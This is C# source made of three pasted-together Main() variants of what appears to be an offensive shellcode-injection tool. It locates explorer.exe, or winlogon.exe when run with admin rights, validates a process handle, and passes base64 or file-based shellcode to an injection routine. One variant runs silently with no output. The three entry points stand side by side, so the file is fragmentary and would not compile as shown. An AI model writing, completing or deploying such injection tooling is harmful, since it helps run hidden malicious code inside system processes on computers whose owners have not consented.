static void Main(string[] args)
{
//BerlinDefence.PrintBanner();
try
{
String b64ShellCode = Shellcode.b64ShellCode;
Int32 Proc = BerlinDefence.FindExplorerPID();
BerlinDefence.PROC_VALIDATION pv = BerlinDefence.ValidateProc(Proc);
if (!pv.isvalid || pv.hProc == IntPtr.Zero)
{
return;
}
else
{
if (pv.isWow64)
{
return;
}
CastleKingside(b64ShellCode, pv, Proc);
}
} catch
{
BerlinDefence.GetHelp();
}
}
static void Main(string[] args)
{
Boolean Clean = false;
String B64 = @"REPLACETHISWITHSHELLCODE";
try{
Int32 Proc = (args.Length == 0) ? (IsAdministrator() ? Process.GetProcessesByName("winlogon")[0].Id : FindProcId("explorer")) : Int32.Parse(args[0]);
BerlinDefence.PROC_VALIDATION pv = BerlinDefence.ValidateProc(Proc);
if (!pv.isvalid || pv.hProc == IntPtr.Zero)
{
if (!pv.isvalid)
{
Console.WriteLine("[!] Invalid PID specified");
}
else
{
Console.WriteLine("[!] Unable to aquire process handle");
}
return;
}
else
{
Console.WriteLine("|--------");
Console.WriteLine("| Process : " + pv.sName);
Console.WriteLine("| Handle : " + pv.hProc);
Console.WriteLine("| Is x32 : " + pv.isWow64);
Console.WriteLine("|--------");
if (pv.isWow64)
{
Console.WriteLine("\n[!] Injection is only supported for 64-bit processes..");
return;
}
CastleKingside(B64, pv, Proc, Clean);
}
}catch {}
}
static void Main(string[] args)
{
BerlinDefence.PrintBanner();
if (args.Length == 0)
{
BerlinDefence.GetHelp();
}
else
{
int iPathScBin = Array.FindIndex(args, s => new Regex(@"(?i)(-|--|/)(p|Path)$").Match(s).Success);
int iPID = Array.FindIndex(args, s => new Regex(@"(?i)(-|--|/)(i|Inject)$").Match(s).Success);
int bClean = Array.FindIndex(args, s => new Regex(@"(?i)(-|--|/)(c|Clean)$").Match(s).Success);
if (iPathScBin != -1 && iPID != -1)
{
Boolean Clean = false;
if (bClean != -1)
{
Clean = true;
}
try
{
String sPathScBin = args[(iPathScBin + 1)];
Int32 Proc = int.Parse(args[(iPID + 1)]);
Boolean bFilePath = BerlinDefence.PathIsFile(sPathScBin);
BerlinDefence.PROC_VALIDATION pv = BerlinDefence.ValidateProc(Proc);
if (!bFilePath || !pv.isvalid || pv.hProc == IntPtr.Zero)
{
if (!pv.isvalid)
{
Console.WriteLine("[!] Invalid PID specified (-i|--Inject)..");
}
else
{
Console.WriteLine("[!] Unable to aquire process handle (-i|--Inject)..");
}
return;
}
else
{
Console.WriteLine("|--------");
Console.WriteLine("| Process : " + pv.sName);
Console.WriteLine("| Handle : " + pv.hProc);
Console.WriteLine("| Is x32 : " + pv.isWow64);
Console.WriteLine("| Sc binpath : " + sPathScBin);
Console.WriteLine("|--------");
if (pv.isWow64)
{
Console.WriteLine("\n[!] Injection is only supported for 64-bit processes..");
return;
}
CastleKingside(sPathScBin, pv, Proc, Clean);
}
} catch
{
BerlinDefence.GetHelp();
}
}
else
{
BerlinDefence.GetHelp();
}
}
}
